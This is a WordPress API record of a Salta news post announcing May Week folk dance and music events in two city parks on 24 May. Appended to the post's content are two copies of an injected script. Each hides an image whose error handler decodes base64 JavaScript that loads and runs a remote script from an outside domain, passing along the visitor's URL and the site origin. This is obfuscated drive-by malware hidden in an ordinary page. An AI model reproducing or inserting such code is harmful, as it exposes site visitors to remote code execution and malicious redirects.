{"id":2667,"date":"2023-05-23T12:41:51","date_gmt":"2023-05-23T15:41:51","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2667"},"modified":"2025-08-14T00:16:21","modified_gmt":"2025-08-14T03:16:21","slug":"la-semana-de-mayo-se-celebra-en-los-parques-urbanos","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2667","title":{"rendered":"La Semana de Mayo se celebra en los Parques Urbanos"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background\"><em>Los parques del Bicentenario y de la Familia celebrar\u00e1n a la Patria ma\u00f1ana mi\u00e9rcoles 24 de mayo a partir de las 17 hs con actuaciones de grupos musicales y cantantes folcl\u00f3ricos<\/em><\/h4>\n\n\n\n<p>Ma\u00f1ana mi\u00e9rcoles 24 de mayo los parques del Bicentenario y de la Familia celebrar\u00e1n la Patria con actividades para toda la familia a partir de las 17 horas.<\/p>\n\n\n\n<p>En el parque de la zona sudeste, se realizar\u00e1 en la Plaza de Emprendedores un Fog\u00f3n Patrio que contar\u00e1 con la actuaci\u00f3n de la Academia de Danzas Folcl\u00f3ricas Norte Soy y del grupo Los de la Cruz.&nbsp;<\/p>\n\n\n\n<p>En tanto, en el Parque del Bicentenario desde las 17 hasta las 20 horas se disfrutar\u00e1 de la Mateada Popular Folcl\u00f3rica que comenzar\u00e1 con una feria de bollos y la participaci\u00f3n de la Academia de baile Tradici\u00f3n Joven, luego Anah\u00ed Zolorza ofrecer\u00e1 su repertorio; asimismo, actuar\u00e1 el Taller de Folclore de la UCASal; la jornada cerrar\u00e1 con la actuaci\u00f3n del Coro Musicana. &nbsp;<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/la-semana-de-mayo-se-celebra-en-los-parques-urbanos-89800\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Los parques del Bicentenario y de la Familia celebrar\u00e1n a la Patria ma\u00f1ana mi\u00e9rcoles 24 de mayo a partir de las 17 hs con actuaciones de grupos musicales y cantantes folcl\u00f3ricos Ma\u00f1ana mi\u00e9rcoles 24 de mayo los parques del Bicentenario y de la Familia celebrar\u00e1n la Patria con actividades para toda la familia a partir [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2668,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-2667","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2667"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2667"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2667\/revisions"}],"predecessor-version":[{"id":7076,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2667\/revisions\/7076"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2668"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2667"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2667"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2667"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}